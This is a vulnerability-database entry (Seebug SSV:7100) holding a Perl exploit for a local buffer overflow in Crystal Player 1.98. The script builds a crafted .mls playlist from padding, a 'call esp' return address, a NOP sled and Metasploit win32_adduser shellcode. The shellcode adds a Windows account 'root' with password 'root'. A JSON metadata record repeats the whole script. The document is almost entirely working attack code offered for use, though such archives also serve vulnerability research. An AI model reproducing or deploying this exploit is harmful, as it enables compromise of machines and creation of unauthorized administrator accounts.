ID SSV:7100
Type seebug
Reporter Root
Modified 2007-07-31T00:00:00
Description
No description provided by source.
#!/usr/bin/perl
######################################################################################################################
#Crystal Player 1.98
#Playlist(.mls) File Local Buffer Overflow Exploit
#Source:: http://www.crystalplayer.com/CrystalPro.exe
#Credit To Timq For The Vulnerability
#POC By Arham Muhammad
#######################################################################################################################
#While Debugging EIP And EBP Successfully Gets Overwritten!
#Upon Successful Exploitation, DOS Occurs And It Further Destroys The Libraries; Upon Successful Exploitation
#When The Next Time App Is Executed
#It Throws Microsoft Visual C++ Runtime Library Error Followed By Another Exception
#The POC Adds user "root" with password "root" to the os!
#Tested On x86 vista enterprise ed.
#Might require Changing esp address coz of os and sp change
print "Crystal Player 1.98 Local Bufferoverflow Exploit\n";
print "Creating Crafted .mls File\n";
$buff = 'A' x 1033;
$ret = "\x76\xF5\x48\x37"; #call esp in ntdll.dll
# win32_adduser - PASS=root EXITFUNC=seh USER=root Size=232 Encoder=PexFnstenvSub http://metasploit.com
$shellcode = "\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xea". #Add user root with pass root 232 bytes
"\x15\xcd\x86\x83\xeb\xfc\xe2\xf4\x16\xfd\x89\x86\xea\x15\x46\xc3".
"\xd6\x9e\xb1\x83\x92\x14\x22\x0d\xa5\x0d\x46\xd9\xca\x14\x26\xcf".
"\x61\x21\x46\x87\x04\x24\x0d\x1f\x46\x91\x0d\xf2\xed\xd4\x07\x8b".
"\xeb\xd7\x26\x72\xd1\x41\xe9\x82\x9f\xf0\x46\xd9\xce\x14\x26\xe0".
"\x61\x19\x86\x0d\xb5\x09\xcc\x6d\x61\x09\x46\x87\x01\x9c\x91\xa2".
"\xee\xd6\xfc\x46\x8e\x9e\x8d\xb6\x6f\xd5\xb5\x8a\x61\x55\xc1\x0d".
"\x9a\x09\x60\x0d\x82\x1d\x26\x8f\x61\x95\x7d\x86\xea\x15\x46\xee".
"\xd6\x4a\xfc\x70\x8a\x43\x44\x7e\x69\xd5\xb6\xd6\x82\xe5\x47\x82".
"\xb5\x7d\x55\x78\x60\x1b\x9a\x79\x0d\x76\xa0\xe2\xc4\x70\xb5\xe3".
"\xca\x3a\xae\xa6\x84\x70\xb9\xa6\x9f\x66\xa8\xf4\xca\x67\xa2\xe9".
"\x9e\x35\xbf\xe9\x85\x61\xed\xa9\xab\x51\x89\xa6\xcc\x33\xed\xe8".
"\x8f\x61\xed\xea\x85\x76\xac\xea\x8d\x67\xa2\xf3\x9a\x35\x8c\xe2".
"\x87\x7c\xa3\xef\x99\x61\xbf\xe7\x9e\x7a\xbf\xf5\xca\x67\xa2\xe9".
"\x9e\x35\xe2\xc7\xae\x51\xcd\x86";
$nopsled = "\x90" x 797; #Nopsled to fill the buffer
open(mls, ">./buffer.mls");
print mls "$buff";
print mls "$ret";
print mls "$nopsled";
print mls "$shellcode";
print "Crafted File Created!\n";
#Arham Muhammad
#rko.thelegendkiller@ gmail.com
#Greets:: str0ke,Hackman,tushy,And All My Friends, Specially AmBi(Love Ya!!!);
#Gr0undbreakerz
{"href": "https://www.seebug.org/vuldb/ssvid-7100", "status": "poc", "bulletinFamily": "exploit", "modified": "2007-07-31T00:00:00", "title": "CrystalPlayer 1.98 Playlist Crafted mls File Local Buffer Overflow Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-7100", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2007-07-31T00:00:00", "sourceData": "\n #!/usr/bin/perl\r\n######################################################################################################################\r\n#Crystal Player 1.98\r\n#Playlist(.mls) File Local Buffer Overflow Exploit\r\n#Source:: http://www.crystalplayer.com/CrystalPro.exe\r\n#Credit To Timq For The Vulnerability\r\n#POC By Arham Muhammad\r\n#######################################################################################################################\r\n\r\n#While Debugging EIP And EBP Successfully Gets Overwritten!\r\n#Upon Successful Exploitation, DOS Occurs And It Further Destorys The Libraries,Upon Successful Exploitation\r\n#When The Next Time App Is Executed\r\n#It Throws Microsfot Visual C++ Runtime Library Error Followed By An Other Exception\r\n#The POC Add user "root" with password "root" to the os!\r\n#Tested On x86 vista enterprise ed.\r\n#Might require Changing esp address coz of os and sp change\r\n\r\n\r\nprint "Crystal Player 1.98 Local Bufferoverflow Exploit\\n";\r\nprint "Creating Crafted .mls File\\n";\r\n\r\n\r\n$buff = 'A' x 1033;\r\n\r\n\r\n$ret = "\\x76\\xF5\\x48\\x37"; #call esp in ntdll.dll\r\n\r\n\r\n\r\n# win32_adduser - PASS=root EXITFUNC=seh USER=root Size=232 Encoder=PexFnstenvSub http://metasploit.com\r\n$shellcode = "\\x2b\\xc9\\x83\\xe9\\xcc\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xea". 
#Add user root with pass root 232 bytes\r\n"\\x15\\xcd\\x86\\x83\\xeb\\xfc\\xe2\\xf4\\x16\\xfd\\x89\\x86\\xea\\x15\\x46\\xc3".\r\n"\\xd6\\x9e\\xb1\\x83\\x92\\x14\\x22\\x0d\\xa5\\x0d\\x46\\xd9\\xca\\x14\\x26\\xcf".\r\n"\\x61\\x21\\x46\\x87\\x04\\x24\\x0d\\x1f\\x46\\x91\\x0d\\xf2\\xed\\xd4\\x07\\x8b".\r\n"\\xeb\\xd7\\x26\\x72\\xd1\\x41\\xe9\\x82\\x9f\\xf0\\x46\\xd9\\xce\\x14\\x26\\xe0".\r\n"\\x61\\x19\\x86\\x0d\\xb5\\x09\\xcc\\x6d\\x61\\x09\\x46\\x87\\x01\\x9c\\x91\\xa2".\r\n"\\xee\\xd6\\xfc\\x46\\x8e\\x9e\\x8d\\xb6\\x6f\\xd5\\xb5\\x8a\\x61\\x55\\xc1\\x0d".\r\n"\\x9a\\x09\\x60\\x0d\\x82\\x1d\\x26\\x8f\\x61\\x95\\x7d\\x86\\xea\\x15\\x46\\xee".\r\n"\\xd6\\x4a\\xfc\\x70\\x8a\\x43\\x44\\x7e\\x69\\xd5\\xb6\\xd6\\x82\\xe5\\x47\\x82".\r\n"\\xb5\\x7d\\x55\\x78\\x60\\x1b\\x9a\\x79\\x0d\\x76\\xa0\\xe2\\xc4\\x70\\xb5\\xe3".\r\n"\\xca\\x3a\\xae\\xa6\\x84\\x70\\xb9\\xa6\\x9f\\x66\\xa8\\xf4\\xca\\x67\\xa2\\xe9".\r\n"\\x9e\\x35\\xbf\\xe9\\x85\\x61\\xed\\xa9\\xab\\x51\\x89\\xa6\\xcc\\x33\\xed\\xe8".\r\n"\\x8f\\x61\\xed\\xea\\x85\\x76\\xac\\xea\\x8d\\x67\\xa2\\xf3\\x9a\\x35\\x8c\\xe2".\r\n"\\x87\\x7c\\xa3\\xef\\x99\\x61\\xbf\\xe7\\x9e\\x7a\\xbf\\xf5\\xca\\x67\\xa2\\xe9".\r\n"\\x9e\\x35\\xe2\\xc7\\xae\\x51\\xcd\\x86";\r\n\r\n\r\n$nopsled = "\\x90" x 797; #Nopsled to fill the buffer\r\n\r\n\r\n\r\nopen(mls, ">./buffer.mls");\r\nprint mls "$buff";\r\nprint mls "$ret";\r\nprint mls "$nopsled";\r\nprint mls "$shellcode";\r\n\r\n\r\nprint "Crafted File Created!\\n";\r\n\r\n\r\n#Arham Muhammad\r\n#rko.thelegendkiller@ gmail.com\r\n\r\n#Greets:: str0ke,Hackman,tushy,And All My Friends, Specially AmBi(Love Ya!!!);\r\n#Gr0undbreakerz\n ", "id": "SSV:7100", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:00:49", "reporter": "Root", "enchantments": {"score": {"value": 0.6, "vector": "NONE", "modified": "2017-11-19T22:00:49", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T22:00:49", "rev": 2}, "vulnersScore": 0.6}, "references": []}
{}